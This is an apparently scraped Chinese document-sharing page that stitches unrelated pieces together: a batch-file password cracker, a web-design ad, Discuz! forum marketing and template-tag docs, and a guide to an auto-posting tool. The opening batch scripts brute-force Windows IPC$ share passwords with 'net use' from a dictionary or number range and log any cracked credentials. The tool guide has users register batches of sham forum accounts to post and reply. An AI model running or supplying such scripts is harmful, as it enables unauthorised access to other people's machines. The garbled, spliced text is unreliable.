主机ipc$ "%i" /user:"用户" 实现: 将下面文件存为start.bat: @echo off echo ---------------------------------------- >>c:pwd.txt date /t >>c:pwd.txt time /t >>c:pwd.txt echo 破解结果:>>c:pwd.txt if "%6"=="1" goto shit2 :shit1 start "正在破解....." /min cmd /c for /f %%i in (%1) do call test.bat %2 "%%i" %3 goto quit :shit2 start "正在破解......" /min cmd /c for /l %%i in (%1,%2,%3) do call test.bat %4 "%%i" %5 :quit 将下面文件存为test.bat: net use %1ipc$ %2 /user:"%3" goto answer%ERRORLEVEL% rem %ERRORLEVEL% :answer0 echo 远程主机:"%1" >>c:pwd.txt echo 用户:"%3" >>c:pwd.txt echo 密码:%2 >>c:pwd.txt net use %1ipc$ /delet date /t >>c:pwd.txt time /t >>c:pwd.txt echo 破解完成。。。。zypcc >>c:pwd.txt exit :answer2 用法如下: 1、如果用字典破解:start.bat 字典文件路径及名称主机用户名 2、如果用数字破解: start.bat 起始数步长结束数主机用户名1 -------------------------------------------------------------------------------------------------------------------------- 本资料由郑州网站建设E网中国(https://www.doczj.com/doc/f815390276.html,)整理编辑,未经许可不得转载。。郑州网站建设,郑州网站设计制作,郑州网络公司,网站优化,网站推广,网站搜索引擎优化请找专业郑州网站建设E网中国 -------------------------------------------------------------------------------------------------------------------------- 一、Discuz!社区动力论坛系统简介: CrossdayDiscuz! Board 论坛系统(简称Discuz! 论坛,中国国家版权局著作权登记号2006SR11895)是一个采用PHP 和MySQL 等其他多种数据库构建的高效论坛解决方案。论坛软件系统亦称电子公告板(BBS)系统,它伴随社区BBS的流行而成为互联网最重要的应用之一,也逐渐成为网站核心竞争力的标志性体现。作为商业软件产品,Discuz! 在代码质量,运行效率,负载 能力,安全等级,功能可操控性和权限严密性等方面都在广大用户中有良好的口碑。2006年7月CNNIC 发布的最新统计表明,43.2% 的中国网民经常使用论坛/BBS/讨论组,论坛社区应用首次超过即时通讯 IM ,成为仅次于收发Email的互联网基本应用。 Crossday Discuz! Board(以下简称 Discuz!,中国国家版权局著作权登记号 2006SR11895)是康盛创想(北京)科技有限公司(英文简称Comsenz)推出的一套通用的社区论坛软件系统,用户可以在不需要任何编程的基础上,通过简单的设置和安装,在互联网上搭建起具备完善功能、很强负载能力和可高度定制的论坛服务。Discuz! 的基础架构采用世界上最流行的 web 编程组合 PHP+MySQL 实现,是一个经过完善设计,适用于各种服务器环境的高效论坛系统解决方案。 作为国内最大的社区软件及服务提供商,Comsenz旗下的 Discuz! 开发组具有丰富的 web 应用程序设计经验,尤其在论坛产品及相关领域,经过长期创新性开发,掌握了一整套从算法,数据结构到产品安全性方面的领先技术。凭借 Discuz! 开发组长期积累的丰富的 web 开发及数据库经验,和强于创新,追求完美的设计理念,使得 Discuz! 在很短时间内以其鲜明的个性特色从国内外同类产品中脱颖而出。经过了效率最优化和负载能力最佳化设计的 Discuz! ,已获得业内越来越多专家和权威企业的认可。 使得 Discuz! 无论在稳定性,负载能力,安全保障等方面都居于国内外同类产品领先地位。 二、Discuz! 适用于以下的应用领域: 对稳定性和负载能力要求较高的门户网站大中型企业的客户在线调查、技术与产品服务企事业单位内部交流与沟通,办公协作与自动化(OA)大中专院校的学生、教工与校友讨论区已经发展到一定规模,具有相当访问量的个人网站商业、交友、科技、影音、下载等等方面的专门网站地方政府、电信公司或爱好者建立的地域性讨论区以上仅是一些常见应用领域的举例,事实上,Discuz! 因其全面的功能设计和可圈点的安全防范,几乎适用于所有需要互动和交流功能的网站,尤其是已经具备相当规模,且经常因为服务器资源耗尽、安全问题或其他原因而损失人气的中大型应用案例。同时我们也不断吸取用户的意见和建议,在现有系统的基础上,降低应用门槛、简化和人性化使用操作,有的放矢的进行功能扩充,使Discuz! 适用于更多的应用领域。 三、Discuz!重点功能: A 性能优化内置完善的解决方案,继续提升产品负载能力 B 短消息增加多人会话模式,并支持后台批量搜索管理 免费建站程序大全 如今科技日新月异,任何科技发展都是为了让事情变得更简单和快捷,互联网技术也一样,国内也出现了一批很专业的专门用于做网站的建站程序,有的甚至支持多语言,多站点,总之有一句话说得好,站在巨人肩上会看的更高,一样道理,不是每个想拥有网站的人都会编写程序,所有利用网站程序来制作网站就是一个非常省力,省时的过程,国内很多网站90%都是基于这些专业系统基础上搭建,当然,选中一个系统后你需要去熟悉这个系统功能你才能运用得很好,只需要花几天时间看看教程就可以熟练运用并建站,下面收集了国内一些比较常用和知名的程序,大家可以根据自己要做的网站类型去下载对应的系统,系统地址这里就不发了,自己百度一下就能找到(如果你这个都找不到,建议你回家种地) 用过帝国、用过新云、pageadmin 、dedecms等系统,在此,长话短说,把觉得对新手比较有用的心得稍微整理下。 1、帝国,是一个比较完整的系统,在功能上很不错,但它的免费版本在二次开发上是比较要求高的,尤其是对于新手,要读懂它的所有程序功能使用,就要花上好一段时间,如果你对语言不熟悉的话,那就更加困难了,如果是新手建议不用帝国。 2、dedecm,大家应该有听过,功能很强,算国内最成功的cms,但是要求比较高,如果要二次开发或修改,必须很熟悉php程序才可能实现 3、pageadmin,是一款值得称赞的系统,功能设计比较灵活,扩展性也很抢,很多站长使用它来建站,原因很简单,做一个网站1天就能搞定。 2、新云,界面清新,本人比较喜欢,适合做行业站,下载站点最适合不过了,国内很多知名下载站都是用新云的系统。 下面收集了一些其他类型网站系统 论坛 1、Discuz系统 2、Phpwind系统 3、BBSMAX系统 商城:用来做在线购物网站 1、Ecshop 2、ShopEX 1、Discuz论坛系统采集维护王(发贴王)大挪移(搬家王)软件设置 软件设置步骤一 1、维护王(发贴王)大挪移(搬家王)软件设置都是一样的,我们就以维护王(发贴王)为例来介绍软件设置 你的网站是GBK版就运行标准版的软件如果你网站是UTF8编码的版本运行UTF8版的采集软件 运行咱们的采集软件,点击步骤一网站设置 2、打开您的网站首页复制你的首页地址 3、把首页地址粘贴到软件步骤一里的首页地址位置 4、鼠标右键点击您的网站首页里面的登陆————显示一个菜单—————鼠标点击菜单里的属性——————出现一个窗口,复制里面的登陆地址 5、把登陆地址粘贴到软件步骤一里的登陆地址位置 6、网站类型选择您的网站如果是discuz 7.00 那么,在就下图里面选择 No0 Discuz! 7.00 版标准论坛类型 7、点击保存设置采集软件将保存步骤一的设置并退出到软件主画面 这样软件步骤一就设置完成了,步骤二设置有些麻烦,让我们先跳过,接下来让我们继续设置步骤三 软件设置步骤三顶贴会员设置 点击步骤三顶贴会员设置(注:这里是设置软件发布文章时的作者,和回复文章时的会员名) 您可以使用我们的DISCUZ注册软件在您的DISCUZ论坛上注册一批会员,注册好后,把这批会员放在软件步骤三里 但注意一点,您放到软件里的会员必须全部能在您的DISCUZ论坛上能正常登陆,(您可以手工试试看能不能登陆) 1、放入在网站注册成功的会员 2、每一行一个会员最多可放500个会员 3、会员名称和登陆密码之间要空10个以上的空格 会员安要求设置好后,点击保存软件自动退回主界面这样步骤三就设置成功了,接下来,让我们继续设置步骤二 软件设置步骤二板块及发贴板块ID设置 1、鼠标点击步骤二板块及发贴板块ID设置——————将进入软件版块及发贴设置,这里是用来设置,发布文章网址,和回复文章网址用的 Discuz模板引擎标签 2009-06-03 09:18 Discuz! 的模板采用近似 PHP 表达式的语法,支持的元素如下: 1. 逻辑元素包围符,该符号用于包含条件和循环元素,其中: statement1 statement2 statement3 为一个典型的条件模板,当条件 expr1 为真时,显示模板 statement1 内容;否则当 expr2 为真时,显示模板 statement2 内容,否则显示模板 statement3 的内容.如同 其他语言中的条件控制一样,其中 和 是非 必须的. statement 相当于 PHP 的数组循环语句 foreach($array as $value) { statement } 而 statement 相当于 PHP 的数组循环语句 foreach($array as $key => $value) { statement } 逻辑元素包围符在 { } 外面包含了 html 的注释符号 ,除了为了和信息元素 相区别外,也方便了使用 Dreamweaver 和 Frontpage 之类工具编辑模板的用户.因逻 辑元素会被识别为 html 的注释而不被显示,对于绝大多数用户,逻辑元素中的内容是 完全不需要修改的,甚至修改错一个字符就可能引起错误信息和整个系统无法运行.因 此通常您在修改模板的时候,不要修改模板的逻辑信息,更不要将逻辑信息内部元素(如 等)的位置,否则可能会导致错误.如果您的模板被不慎修改损坏,请立 即用原始模板覆盖,即可恢复. 对于高手而言,实际上外部的 是可以省略不写的,可以用于某些元素在模板 中的定位,但强烈建议普通用户不要轻易尝试. 2. { ... } 信息元素包围符,其中 {CONSTANT} 可以引用界面替换变量,其中必须为大写字母,该符号实际的作用是引用 PHP 常量 CONSTANT,因此也可以通过它来引用其他的常量内容. {lang variable} 可以在模板中引用语言变量 variable 的内容,语言变量经由 https://www.doczj.com/doc/f815390276.html,ng 中数组 $language 定义. 如 {lang post_edit} 的内容在编译模板的时候被替换为 $language['post_edit'] 的内容,简体中文版的意思是 "编辑帖子". {faq variable} 可以在模板中引用论坛帮助的帮助关键字,在后台=>其他设置=》论坛帮助=》具体某个帮助的详情可以看到或者设置 3. {template name} 模板嵌入符,为了避免模板的冗长,可以使用本符号来将 name 模板的内容嵌DZ论坛的几个使用技巧
十年相伴 共创经典 Discuz!系列经典产品回顾
discuz X2二次开发帮助文档
DISCUZ论坛代码大全
Discuz教程
BurpSuite爆破密码
discuz数据库详解
暴力破解密码C语言
Discuz! 道具系统道具开发文档
Discuz论坛安装及使用全过程
discuz文件目录及文件总结
Discuz论坛后台设置详细-乐赢科技
免费搭建discuz论坛教程
写Bat暴力破解系统密码
网站建设系统解决方案Discuz!社区动力论坛系统解决方案
免费建站程序大全
Discuz论坛系统采集完美教程!
Discuz模板引擎标签
相关主题
文本预览